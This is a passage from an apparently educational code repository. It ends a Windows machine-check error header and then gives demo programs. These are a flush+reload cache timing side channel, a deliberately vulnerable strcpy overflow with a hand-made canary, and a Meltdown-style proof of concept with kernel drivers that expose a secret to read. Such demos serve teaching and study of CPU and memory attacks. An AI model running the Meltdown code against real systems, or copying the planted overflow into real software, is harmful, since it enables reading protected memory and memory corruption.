16-11: First cycle of request bus 990 | ULONGLONG RequestBusSecondCycle:6; // 22-17: Second cycle of request bus 991 | ULONGLONG AddressParityBusFirstCycle:2; // 24-23: First cycle of address parity bus 992 | ULONGLONG AddressParityBusSecondCycle:2; // 26-25: Second cycle of address parity 993 | ULONGLONG ResponseBus:3; // 29-27: Response bus 994 | ULONGLONG RequestParitySignalFirstCycle:1; // 30: First cycle of request parity signal 995 | ULONGLONG RequestParitySignalSecondCycle:1; // 31: Second cycle of request parity signal 996 | ULONGLONG Reserved:32; // 63-32: Reserved 997 | } DUMMYSTRUCTNAME; 998 | } ERROR_BUS_SPECIFIC_DATA, *PERROR_BUS_SPECIFIC_DATA; 999 | 1000 | // 1001 | // IA64 ERRORS: Platform ERROR_MEMORY device definitions 1002 | // 1003 | // With reference to the ACPI Memory Device. 1004 | // 1005 | 1006 | #define ERROR_MEMORY_GUID \ 1007 | { 0xe429faf2, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1008 | 1009 | typedef union _ERROR_MEMORY_VALID { 1010 | ULONGLONG Valid; 1011 | struct { // Bits 1012 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1013 | ULONGLONG PhysicalAddress:1; // 1: Physical Address valid bit 1014 | ULONGLONG AddressMask:1; // 2: Address Mask bit 1015 | ULONGLONG Node:1; // 3: Node valid bit 1016 | ULONGLONG Card:1; // 4: Card valid bit 1017 | ULONGLONG Module:1; // 5: Module valid bit 1018 | ULONGLONG Bank:1; // 6: Bank valid bit 1019 | ULONGLONG Device:1; // 7: Device valid bit 1020 | ULONGLONG Row:1; // 8: Row valid bit 1021 | ULONGLONG Column:1; // 9: Column valid bit 1022 | ULONGLONG BitPosition:1; // 10: Bit Position valid bit 1023 | ULONGLONG RequestorId:1; // 11: Platform Requester Id valid bit 1024 | ULONGLONG ResponderId:1; // 12: Platform Responder Id valid bit 1025 | ULONGLONG TargetId:1; // 13: Platform Target Id valid bit 1026 | ULONGLONG BusSpecificData:1; // 14: Platform Bus specific data valid bit 1027 | ULONGLONG OemId:1; // 15: Platform OEM id valid bit 1028 | ULONGLONG OemData:1; // 16: Platform OEM data valid bit 1029 | ULONGLONG Reserved:47; // 63-17: Reserved 1030 | } DUMMYSTRUCTNAME; 1031 | } ERROR_MEMORY_VALID, *PERROR_MEMORY_VALID; 1032 | 1033 | typedef struct _ERROR_MEMORY { 1034 | ERROR_SECTION_HEADER Header; 1035 | ERROR_MEMORY_VALID Valid; 1036 | ERROR_STATUS ErrorStatus; // Memory device error status fields - See ERROR_STATUS defs. 1037 | ULONGLONG PhysicalAddress; // Physical Address of the memory error 1038 | ULONGLONG PhysicalAddressMask; // Valid bits for Physical Address 1039 | USHORT Node; // Node identifier in a multi-node system 1040 | USHORT Card; // Card number of the memory error location 1041 | USHORT Module; // Module number of the memory error location 1042 | USHORT Bank; // Bank number of the memory error location 1043 | USHORT Device; // Device number of the memory error location 1044 | USHORT Row; // Row number of the memory error location 1045 | USHORT Column; // Column number of the memory error location 1046 | USHORT BitPosition; // Bit within the word that is in error 1047 | ULONGLONG RequestorId; // Hardware address of the device or component initiating transaction 1048 | ULONGLONG ResponderId; // Hardware address of the responder to transaction 1049 | ULONGLONG TargetId; // Hardware address of intended target of transaction 1050 | ULONGLONG BusSpecificData; // Bus dependent data of the on-board processor. It is a OEM specific field. 1051 | UCHAR OemId[16]; // OEM defined identification for memory controller 1052 | ERROR_OEM_DATA OemData; // OEM platform specific data. 1053 | } ERROR_MEMORY, *PERROR_MEMORY; 1054 | 1055 | // 1056 | // IA64 ERRORS: Platform ERROR_PCI_BUS device definitions 1057 | // 1058 | // With reference to the PCI Specifications. 1059 | // 1060 | 1061 | #define ERROR_PCI_BUS_GUID \ 1062 | { 0xe429faf4, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1063 | 1064 | typedef union _ERROR_PCI_BUS_VALID { 1065 | ULONGLONG Valid; 1066 | struct { // Bits 1067 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1068 | ULONGLONG ErrorType:1; // 1: Error Type valid bit 1069 | ULONGLONG Id:1; // 2: Identifier valid bit 1070 | ULONGLONG Address:1; // 3: Address valid bit 1071 | ULONGLONG Data:1; // 4: Data valid bit 1072 | ULONGLONG CmdType:1; // 5: Command Type valid bit 1073 | ULONGLONG RequestorId:1; // 6: Requester Identifier valid bit 1074 | ULONGLONG ResponderId:1; // 7: Responder Identifier valid bit 1075 | ULONGLONG TargetId:1; // 8: Target Identifier valid bit 1076 | ULONGLONG OemId:1; // 9: OEM Identification valid bit 1077 | ULONGLONG OemData:1; // 10: OEM Data valid bit 1078 | ULONGLONG Reserved:53; // 11-63: Reserved 1079 | } DUMMYSTRUCTNAME; 1080 | } ERROR_PCI_BUS_VALID, *PERROR_PCI_BUS_VALID; 1081 | 1082 | typedef struct _ERROR_PCI_BUS_TYPE { 1083 | UCHAR Type; 1084 | UCHAR Reserved; 1085 | } ERROR_PCI_BUS_TYPE, *PERROR_PCI_BUS_TYPE; 1086 | 1087 | #define PciBusUnknownError ((UCHAR)0) 1088 | #define PciBusDataParityError ((UCHAR)1) 1089 | #define PciBusSystemError ((UCHAR)2) 1090 | #define PciBusMasterAbort ((UCHAR)3) 1091 | #define PciBusTimeOut ((UCHAR)4) 1092 | #define PciMasterDataParityError ((UCHAR)5) 1093 | #define PciAddressParityError ((UCHAR)6) 1094 | #define PciCommandParityError ((UCHAR)7) 1095 | // PciOtherErrors Reserved 1096 | 1097 | typedef struct _ERROR_PCI_BUS_ID { 1098 | UCHAR BusNumber; // Bus Number 1099 | UCHAR SegmentNumber; // Segment Number 1100 | } ERROR_PCI_BUS_ID, *PERROR_PCI_BUS_ID; 1101 | 1102 | typedef struct _ERROR_PCI_BUS { 1103 | ERROR_SECTION_HEADER Header; 1104 | ERROR_PCI_BUS_VALID Valid; 1105 | ERROR_STATUS ErrorStatus; // PCI Bus Error Status - See ERROR_STATUS definitions. 1106 | ERROR_PCI_BUS_TYPE Type; // PCI Bus Error Type 1107 | ERROR_PCI_BUS_ID Id; // PCI Bus Identifier 1108 | UCHAR Reserved[4]; // Reserved 1109 | ULONGLONG Address; // Memory or IO Address on the PCI bus at 1110 | // the time of the event 1111 | ULONGLONG Data; // Data on the PCI bus at time of the event 1112 | ULONGLONG CmdType; // Bus Command or Operation at time of the event 1113 | ULONGLONG RequestorId; // Bus Requester Identifier at time of the event 1114 | ULONGLONG ResponderId; // Bus Responder Identifier at time of the event 1115 | ULONGLONG TargetId; // Intended Bus Target Identifier at time of the event 1116 | UCHAR OemId[16]; // OEM defined identification for pci bus 1117 | ERROR_OEM_DATA OemData; // OEM specific data. 1118 | } ERROR_PCI_BUS, *PERROR_PCI_BUS; 1119 | 1120 | // 1121 | // IA64 ERRORS: Platform ERROR_PCI_COMPONENT device definitions 1122 | // 1123 | // With reference to the PCI Specifications. 1124 | // 1125 | 1126 | #define ERROR_PCI_COMPONENT_GUID \ 1127 | { 0xe429faf6, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1128 | 1129 | typedef union _ERROR_PCI_COMPONENT_VALID { 1130 | ULONGLONG Valid; 1131 | struct { // Bits: 1132 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1133 | ULONGLONG Info:1; // 1: Information valid bit 1134 | ULONGLONG MemoryMappedRegistersPairs:1; // 2: Number of Memory Mapped Registers Pairs valid bit 1135 | ULONGLONG ProgrammedIORegistersPairs:1; // 3: Number of Programmed IO Registers Pairs valid bit 1136 | ULONGLONG RegistersDataPairs:1; // 4: Memory Mapped Registers Pairs valid bit 1137 | ULONGLONG OemData:1; // 5: OEM Data valid bit. 1138 | ULONGLONG Reserved:58; // 63-6: Reserved 1139 | } DUMMYSTRUCTNAME; 1140 | } ERROR_PCI_COMPONENT_VALID, *PERROR_PCI_COMPONENT_VALID; 1141 | 1142 | typedef struct _ERROR_PCI_COMPONENT_INFO { // Bytes: 1143 | USHORT VendorId; // 0-1: Vendor Identifier 1144 | USHORT DeviceId; // 2-3: Device Identifier 1145 | UCHAR ClassCodeInterface; // 4: Class Code.Interface field 1146 | UCHAR ClassCodeSubClass; // 5: Class Code.SubClass field 1147 | UCHAR ClassCodeBaseClass; // 6: Class Code.BaseClass field 1148 | UCHAR FunctionNumber; // 7: Function Number 1149 | UCHAR DeviceNumber; // 8: Device Number 1150 | UCHAR BusNumber; // 9: Bus Number 1151 | UCHAR SegmentNumber; // 10: Segment Number 1152 | UCHAR Reserved0; 1153 | ULONG Reserved1; 1154 | } ERROR_PCI_COMPONENT_INFO, *PERROR_PCI_COMPONENT_INFO; 1155 | 1156 | typedef struct _ERROR_PCI_COMPONENT { 1157 | ERROR_SECTION_HEADER Header; 1158 | ERROR_PCI_COMPONENT_VALID Valid; 1159 | ERROR_STATUS ErrorStatus; // Component Error Status 1160 | ERROR_PCI_COMPONENT_INFO Info; // Component Information 1161 | ULONG MemoryMappedRegistersPairs; // Number of Memory Mapped Registers Pairs 1162 | ULONG ProgrammedIORegistersPairs; // Number of Programmed IO Registers Pairs 1163 | #if 0 1164 | ULONGLONG RegistersPairs[/* 2 * (MemoryMappedRegistersPairs + ProgrammedIORegistersPairs) */]; 1165 | ERROR_OEM_DATA OemData; 1166 | #endif // 0 1167 | } ERROR_PCI_COMPONENT, *PERROR_PCI_COMPONENT; 1168 | 1169 | // 1170 | // IA64 ERRORS: Platform ERROR_SYSTEM_EVENT_LOG device definitions 1171 | // 1172 | // With reference to the IPMI System Event Log. 1173 | // 1174 | 1175 | #define ERROR_SYSTEM_EVENT_LOG_GUID \ 1176 | { 0xe429faf3, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1177 | 1178 | typedef union _ERROR_SYSTEM_EVENT_LOG_VALID { 1179 | ULONGLONG Valid; 1180 | struct { // Bits 1181 | ULONGLONG RecordId:1; // 0: Record Identifier valid bit 1182 | ULONGLONG RecordType:1; // 1: Record Type valid bit 1183 | ULONGLONG GeneratorId:1; // 2: Generator Identifier valid bit 1184 | ULONGLONG EVMRev:1; // 3: Event Format Revision valid bit 1185 | ULONGLONG SensorType:1; // 4: Sensor Type valid bit 1186 | ULONGLONG SensorNum:1; // 5: Sensor Number valid bit 1187 | ULONGLONG EventDirType:1; // 6: Event Dir valid bit 1188 | ULONGLONG EventData1:1; // 7: Event Data1 valid bit 1189 | ULONGLONG EventData2:1; // 8: Event Data2 valid bit 1190 | ULONGLONG EventData3:1; // 9: Event Data3 valid bit 1191 | ULONGLONG Reserved:54; // 10-63: 1192 | } DUMMYSTRUCTNAME; 1193 | } ERROR_SYSTEM_EVENT_LOG_VALID, *PSYSTEM_EVENT_LOG_VALID; 1194 | 1195 | typedef struct _ERROR_SYSTEM_EVENT_LOG { 1196 | ERROR_SECTION_HEADER Header; 1197 | ERROR_SYSTEM_EVENT_LOG_VALID Valid; 1198 | USHORT RecordId; // Record Identifier used for SEL record access 1199 | UCHAR RecordType; // Record Type: 1200 | // 0x02 - System Event Record 1201 | // 0xC0 - 0xDF OEM time stamped, bytes 8-16 OEM defined 1202 | // 0xE0 - 0xFF OEM non-time stamped, bytes 4-16 OEM defined 1203 | ULONG TimeStamp; // Time stamp of the event log 1204 | USHORT GeneratorId; // Software ID if event was generated by software 1205 | // Byte 1: 1206 | // Bit 0 - set to 1 when using system software 1207 | // Bit 7:1 - 7-bit system ID 1208 | // Byte 2: 1209 | // Bit 1:0 - IPMB device LUN if byte 1 holds subordinate 1210 | // address, 0x0 otherwise 1211 | // Bit 7:2 - Reserved. 1212 | UCHAR EVMRevision; // Error message format version 1213 | UCHAR SensorType; // Sensor Type code of the sensor that generated event 1214 | UCHAR SensorNumber; // Number of the sensor that generated event 1215 | UCHAR EventDir; // Event Dir 1216 | // Bit 7 - 0: asserted, 1: desasserted 1217 | // Event Type 1218 | // Bit 6:0 - Event Type code 1219 | UCHAR Data1; // Event data field 1220 | UCHAR Data2; // Event data field 1221 | UCHAR Data3; // Event data field 1222 | } ERROR_SYSTEM_EVENT_LOG, *PERROR_SYSTEM_EVENT_LOG; 1223 | 1224 | // 1225 | // IA64 ERRORS: Platform ERROR_SMBIOS device definitions 1226 | // 1227 | // With reference to the SMBIOS Specifications. 1228 | // 1229 | 1230 | #define ERROR_SMBIOS_GUID \ 1231 | { 0xe429faf5, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1232 | 1233 | typedef union _ERROR_SMBIOS_VALID { 1234 | ULONGLONG Valid; 1235 | struct { // Bits 1236 | ULONGLONG EventType:1; // 0: Event Type valid bit 1237 | ULONGLONG Length:1; // 1: Length valid bit 1238 | ULONGLONG TimeStamp:1; // 2: Time Stamp valid bit 1239 | ULONGLONG OemData:1; // 3: Data valid bit 1240 | ULONGLONG Reserved:60; // 4-63: 1241 | } DUMMYSTRUCTNAME; 1242 | } ERROR_SMBIOS_VALID, *PERROR_SMBIOS_VALID; 1243 | 1244 | // 1245 | // ERROR_SMBIOS.Type definitions 1246 | // 1247 | 1248 | typedef UCHAR ERROR_SMBIOS_EVENT_TYPE, *PERROR_SMBIOS_EVENT_TYPE; 1249 | // enum values defined in SMBIOS 2.3 - 3.3.16.6.1 1250 | 1251 | typedef struct _ERROR_SMBIOS { 1252 | ERROR_SECTION_HEADER Header; 1253 | ERROR_SMBIOS_VALID Valid; 1254 | ERROR_SMBIOS_EVENT_TYPE EventType; // Event Type 1255 | UCHAR Length; // Length of the error information in bytes 1256 | ERROR_TIMESTAMP TimeStamp; // Event Time Stamp 1257 | ERROR_OEM_DATA OemData; // Optional data validated by SMBIOS.Valid.Data. 1258 | } ERROR_SMBIOS, *PERROR_SMBIOS; 1259 | 1260 | // 1261 | // IA64 ERRORS: Platform Specific error device definitions 1262 | // 1263 | 1264 | #define ERROR_PLATFORM_SPECIFIC_GUID \ 1265 | { 0xe429faf7, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1266 | 1267 | typedef union _ERROR_PLATFORM_SPECIFIC_VALID { 1268 | ULONGLONG Valid; 1269 | struct { // Bits: 1270 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1271 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1272 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1273 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1274 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1275 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1276 | ULONGLONG OemData:1; // 6: OEM Data valid bit 1277 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1278 | ULONGLONG Reserved:56; // 63-8: Reserved 1279 | } DUMMYSTRUCTNAME; 1280 | } ERROR_PLATFORM_SPECIFIC_VALID, *PERROR_PLATFORM_SPECIFIC_VALID; 1281 | 1282 | typedef struct _ERROR_PLATFORM_SPECIFIC { 1283 | ERROR_SECTION_HEADER Header; 1284 | ERROR_PLATFORM_SPECIFIC_VALID Valid; 1285 | ERROR_STATUS ErrorStatus; // Platform Generic Error Status 1286 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event 1287 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event 1288 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event 1289 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1290 | UCHAR OemId[16]; // OEM specific data for bus identification 1291 | ERROR_OEM_DATA OemData; // OEM specific data 1292 | #if 0 1293 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1294 | #endif // 0 1295 | } ERROR_PLATFORM_SPECIFIC, *PERROR_PLATFORM_SPECIFIC; 1296 | 1297 | // 1298 | // IA64 ERRORS: Platform Bus error device definitions 1299 | // 1300 | 1301 | #define ERROR_PLATFORM_BUS_GUID \ 1302 | { 0xe429faf9, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1303 | 1304 | typedef union _ERROR_PLATFORM_BUS_VALID { 1305 | ULONGLONG Valid; 1306 | struct { // Bits: 1307 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1308 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1309 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1310 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1311 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1312 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1313 | ULONGLONG OemData:1; // 6: OEM Data valid bit 1314 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1315 | ULONGLONG Reserved:56; // 63-8: Reserved 1316 | } DUMMYSTRUCTNAME; 1317 | } ERROR_PLATFORM_BUS_VALID, *PERROR_PLATFORM_BUS_VALID; 1318 | 1319 | typedef struct _ERROR_PLATFORM_BUS { 1320 | ERROR_SECTION_HEADER Header; 1321 | ERROR_PLATFORM_BUS_VALID Valid; 1322 | ERROR_STATUS ErrorStatus; // Bus Error Status 1323 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event 1324 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event 1325 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event 1326 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1327 | UCHAR OemId[16]; // OEM specific data for bus identification 1328 | ERROR_OEM_DATA OemData; // OEM specific data 1329 | #if 0 1330 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1331 | #endif // 0 1332 | } ERROR_PLATFORM_BUS, *PERROR_PLATFORM_BUS; 1333 | 1334 | // 1335 | // IA64 ERRORS: Platform Host Controller error device definitions 1336 | // 1337 | 1338 | #define ERROR_PLATFORM_HOST_CONTROLLER_GUID \ 1339 | { 0xe429faf8, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 1340 | 1341 | 1342 | typedef union _ERROR_PLATFORM_HOST_CONTROLLER_VALID { 1343 | ULONGLONG Valid; 1344 | struct { // Bits: 1345 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit 1346 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit 1347 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit 1348 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit 1349 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit 1350 | ULONGLONG OemId:1; // 5: OEM Identification valid bit 1351 | ULONGLONG OemData:1; // 6: OEM Data valid bit 1352 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit 1353 | ULONGLONG Reserved:56; // 63-8: Reserved 1354 | } DUMMYSTRUCTNAME; 1355 | } ERROR_PLATFORM_HOST_CONTROLLER_VALID, *PERROR_PLATFORM_HOST_CONTROLLER_VALID; 1356 | 1357 | typedef struct _ERROR_PLATFORM_HOST_CONTROLLER { 1358 | ERROR_SECTION_HEADER Header; 1359 | ERROR_PCI_COMPONENT_VALID Valid; 1360 | ERROR_STATUS ErrorStatus; // Host Controller Error Status 1361 | ULONGLONG RequestorId; // Host controller Requester ID at the time of the event 1362 | ULONGLONG ResponderId; // Host controller Responder ID at the time of the event 1363 | ULONGLONG TargetId; // Host controller intended Target ID at the time of the event 1364 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data 1365 | UCHAR OemId[16]; // OEM specific data for bus identification 1366 | ERROR_OEM_DATA OemData; // OEM specific data 1367 | #if 0 1368 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path. 1369 | #endif // 0 1370 | } ERROR_PLATFORM_HOST_CONTROLLER, *PERROR_PLATFORM_HOST_CONTROLLER; 1371 | 1372 | // 1373 | // IA64 ERROR_LOGRECORDS definitions 1374 | // 1375 | // MCA_EXCEPTION, 1376 | // CMC_EXCEPTION, 1377 | // CPE_EXCEPTION. 1378 | // 1379 | 1380 | // For compatibility with previous versions of the definitions: 1381 | typedef ERROR_RECORD_HEADER ERROR_LOGRECORD, *PERROR_LOGRECORD; 1382 | 1383 | typedef ERROR_RECORD_HEADER MCA_EXCEPTION, *PMCA_EXCEPTION; // Machine Check Abort 1384 | typedef ERROR_RECORD_HEADER CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check 1385 | typedef ERROR_RECORD_HEADER CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error 1386 | #if (NTDDI_VERSION > NTDDI_WINXP) 1387 | typedef ERROR_RECORD_HEADER INIT_EXCEPTION, *PINIT_EXCEPTION; // Init Event 1388 | #endif 1389 | 1390 | #endif // _IA64_ 1391 | 1392 | #elif defined(_ARM_) || defined(_ARM64_) 1393 | 1394 | // _ARM_WORKITEM_ MCE support 1395 | 1396 | typedef struct _MCA_EXCEPTION { 1397 | 1398 | ULONG Dummy; 1399 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 1400 | 1401 | #endif // defined(_X86_) || defined(_IA64_) || defined(_AMD64_) 1402 | 1403 | #if _MSC_VER >= 1200 1404 | #pragma warning(pop) 1405 | #endif 1406 | 1407 | #endif // _MCE_ 1408 | 1409 | 1410 | -------------------------------------------------------------------------------- /source/bsod/ntoskrnl.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/bsod/ntoskrnl.lib -------------------------------------------------------------------------------- /source/cache.c: -------------------------------------------------------------------------------- 1 | //Build from Visual Studio command prompt: cl.exe cache.c 2 | //Build with GCC: gcc cache.c 3 | 4 | #ifdef _MSC_VER 5 | #include 6 | #else 7 | #include 8 | #endif 9 | #include 10 | #include 11 | #include 12 | 13 | #define PAGE_SIZE (1024 * 4) 14 | #define MAX_VALUE 256 15 | #define CACHE_HIT_THRESHOLD 100 16 | 17 | static uint8_t mem_pages[MAX_VALUE][PAGE_SIZE]; 18 | 19 | int get_access_time(uint8_t* page) 20 | { 21 | unsigned long long tick1, tick2; 22 | unsigned int aux; 23 | 24 | tick1 = __rdtscp(&aux); 25 | uint8_t tmp = *page; 26 | tick2 = __rdtscp(&aux); 27 | 28 | return (tick2 - tick1); 29 | } 30 | 31 | uint8_t detect_memory_quick(uint8_t* address) 32 | { 33 | //move all pages out of cache 34 | for (int i = 0; i < MAX_VALUE; i++) 35 | { 36 | _mm_clflush(mem_pages[i]); 37 | } 38 | 39 | //move 1 page into cache 40 | uint8_t index = *address; 41 | uint8_t temp = mem_pages[index][0]; 42 | 43 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction 44 | for (int i = 0; i < MAX_VALUE; i++) 45 | { 46 | int mix_i = ((i * 167) + 13) & 255; 47 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD) 48 | { 49 | return mix_i; 50 | } 51 | } 52 | 53 | return '?'; 54 | } 55 | 56 | uint8_t detect_memory_slow(uint8_t* address) 57 | { 58 | //move all pages out of cache 59 | for (int i = 0; i < MAX_VALUE; i++) 60 | { 61 | _mm_clflush(mem_pages[i]); 62 | } 63 | 64 | //move 1 page into cache 65 | uint8_t index = *(uint8_t*)address; 66 | uint8_t tmp = mem_pages[index][0]; 67 | 68 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction 69 | int ret = '?'; 70 | int min_time = 10000000; 71 | for (int i = 0; i < MAX_VALUE; i++) 72 | { 73 | int mixed_i = ((i * 167) + 13) & 255; 74 | int access_time = get_access_time(mem_pages[mixed_i]); 75 | if (min_time > access_time) 76 | { 77 | min_time = access_time; 78 | ret = mixed_i; 79 | } 80 | } 81 | 82 | return ret; 83 | } 84 | 85 | char data[] = "password"; 86 | 87 | int main() 88 | { 89 | memset(mem_pages, 1, sizeof(mem_pages)); 90 | 91 | printf("The data: "); 92 | for (int i = 0; i < strlen(data); i++) 93 | { 94 | printf("%c", detect_memory_quick((uint8_t*)&data[i])); 95 | } 96 | printf("\n"); 97 | 98 | printf("The data: "); 99 | for (int i = 0; i < strlen(data); i++) 100 | { 101 | printf("%c", detect_memory_slow((uint8_t*)&data[i])); 102 | } 103 | printf("\n"); 104 | } 105 | -------------------------------------------------------------------------------- /source/canary.c: -------------------------------------------------------------------------------- 1 | // gcc -fstack-protector canary.c 2 | // ./a.out 12345678901234 3 | // ./a.out 123456789012345 4 | // ./a.out 1234567890123456789012345 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | #define CANARY_VALUE 0xFE 11 | 12 | // Function to simulate a vulnerable function with a canary 13 | void vulnerableFunction(char *input) { 14 | // Set up a canary value 15 | char buffer[16]; 16 | buffer[15] = CANARY_VALUE; 17 | 18 | // Simulate an unsafe copy which might cause buffer overflow 19 | strcpy(buffer, input); 20 | 21 | // Check if the canary value has been altered 22 | if (buffer[15] != (char)CANARY_VALUE) { 23 | printf("Stack smashing detected! Program will terminate.\n"); 24 | } else { 25 | printf("No overflow detected. Function executed safely.\n"); 26 | } 27 | } 28 | 29 | int main(int argc, char *argv[]) { 30 | if (argc < 2) { 31 | printf("Usage: %s \n", argv[0]); 32 | return 1; 33 | } 34 | 35 | // Call the vulnerable function with user input 36 | vulnerableFunction(argv[1]); 37 | 38 | return 0; 39 | } 40 | -------------------------------------------------------------------------------- /source/meltdown/linuxDriver/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += kernelDriver.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | -------------------------------------------------------------------------------- /source/meltdown/linuxDriver/kernelDriver.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define DRIVER_AUTHOR "Your Name " 6 | #define DRIVER_DESC "A simple module to print a kernel variable's address" 7 | 8 | // Initialization function 9 | static int __init hello_init(void) { 10 | static unsigned char secret = 137; 11 | printk(KERN_INFO "Hello, World!\n"); 12 | printk(KERN_INFO "Address of the secret: %p\n", (void *)&secret); 13 | return 0; // Non-zero return means that the module couldn't be loaded. 14 | } 15 | 16 | // Exit function 17 | static void __exit hello_exit(void) { 18 | printk(KERN_INFO "Goodbye, World!\n"); 19 | } 20 | 21 | // Macros for registering module entry and exit points 22 | module_init(hello_init); 23 | module_exit(hello_exit); 24 | 25 | MODULE_LICENSE("GPL"); 26 | MODULE_AUTHOR(DRIVER_AUTHOR); 27 | MODULE_DESCRIPTION(DRIVER_DESC); 28 | MODULE_VERSION("0.1"); 29 | -------------------------------------------------------------------------------- /source/meltdown/meltdown.c: -------------------------------------------------------------------------------- 1 | //Build from Visual Studio command prompt: cl.exe meltdown.c 2 | //Build with GCC: gcc meltdown.c 3 | 4 | #ifdef _MSC_VER 5 | #include 6 | #else 7 | #include 8 | #endif 9 | #include 10 | #include 11 | 12 | #define PAGE_SIZE (1024 * 4) 13 | #define PAGE_NUM 256 14 | #define CACHE_HIT_THRESHOLD 100 15 | 16 | int get_access_time(uint8_t* page) 17 | { 18 | unsigned long long tick1, tick2; 19 | unsigned int aux; 20 | 21 | tick1 = __rdtscp(&aux); 22 | uint8_t tmp = *page; 23 | tick2 = __rdtscp(&aux); 24 | 25 | return (tick2 - tick1); 26 | } 27 | 28 | uint8_t mem_pages[PAGE_NUM][PAGE_SIZE]; 29 | 30 | int detect_cached_page() 31 | { 32 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction 33 | for (int i = 0; i < PAGE_NUM; i++) 34 | { 35 | uint8_t mix_i = ((i * 167) + 13) & 255; 36 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD) 37 | { 38 | return mix_i; 39 | } 40 | } 41 | 42 | return -1; 43 | } 44 | 45 | uint8_t* get_input() 46 | { 47 | uint8_t* target_address; 48 | printf("Input the target address in hexadecimal: "); 49 | scanf("%llx", &target_address); 50 | return target_address; 51 | } 52 | 53 | int main() 54 | { 55 | static uint8_t tmp = 37; 56 | uint8_t* target_address = get_input(); 57 | printf("Target Address = %p\n", target_address); 58 | 59 | memset(mem_pages, 1, sizeof(mem_pages)); 60 | for(int i = 0; i < 30; i++) 61 | { 62 | _mm_clflush(&tmp); 63 | for (int i = 0; i < PAGE_NUM; i++) 64 | { 65 | _mm_clflush(mem_pages[i]); 66 | } 67 | 68 | if(tmp == 0) 69 | { 70 | tmp = mem_pages[*target_address][0]; 71 | } 72 | 73 | int cached_page = detect_cached_page(); 74 | printf("Guess the data = %d, %c\n", cached_page, cached_page); 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /source/meltdown/winDriver/kernelDriver.c: -------------------------------------------------------------------------------- 1 | //cl.exe .\kernelDriver.c ntoskrnl.lib /I .\ /link /out:kernelDriver.sys /subsystem:native /driver:wdm -entry:DriverEntry 2 | 3 | //sc create abuDriver binpath=%cd%\kernelDriver.sys type=kernel 4 | //sc start abuDriver 5 | //sc stop abuDriver 6 | //sc delete abuDriver 7 | 8 | #define _AMD64_ 9 | #include "wdm.h" 10 | 11 | const char* secret = "Hello AbuCoding"; 12 | 13 | NTSTATUS DriverEntry(void* a, void* b) 14 | { 15 | DbgPrint("%p, %s", secret, secret); 16 | } 17 | -------------------------------------------------------------------------------- /source/meltdown/winDriver/kernelDriver.sys: -------------------------------------------------------------------------------- 